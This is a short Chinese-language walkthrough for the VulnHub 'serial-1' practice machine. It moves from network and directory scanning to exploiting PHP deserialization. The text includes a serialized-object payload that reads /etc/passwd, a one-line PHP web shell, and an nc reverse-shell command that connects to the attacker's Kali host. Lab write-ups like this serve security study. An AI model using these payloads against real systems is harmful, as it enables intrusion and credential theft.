去vulhub上下载此靶机:
https://www.vulnhub.com/entry/serial-1,349/
用Vmware新建虚拟机打开

用kali扫描ip arp-scan -l

访问扫描到的靶机ip访问

按F12 ---》网络---》cookie得到一串编码

base64解码

dirb http://靶机ip 扫描目录

访问backup目录

解压得到三个php文件


构造payload
<?php
class Log {
private $type_log = "/etc/passwd";
}
class User {
private $name = "admin";
private $wel;
function __construct() {
$this->wel = new Log();
}
}
$obj = new User();
echo base64_encode(serialize($obj));
?>
访问构造好的php文件获取到base64编码后的字节序列

抓包,将编码后的数据抓包后替换红色部分

写一个cmd.txt文件
<?php @system($ GET['cmd']); ?>
修改palyload改为本机ip加上我们创建的文件

访问重新修改的gouzao.php文件

攻击模块替换 查询ip

成功执行反弹shell
讲以下参数修改为kali ip 和指定端口去kali监听
rm+/tmp/f%3bmkfifo+/tmp/f%3bcat+/tmp/f|/bin/sh+-i+2>%261|nc+192.168.162.129+8888+>/tmp/f

开启监听

查找txt文件

查看账号密码

用御剑扫描端口

远程连接




















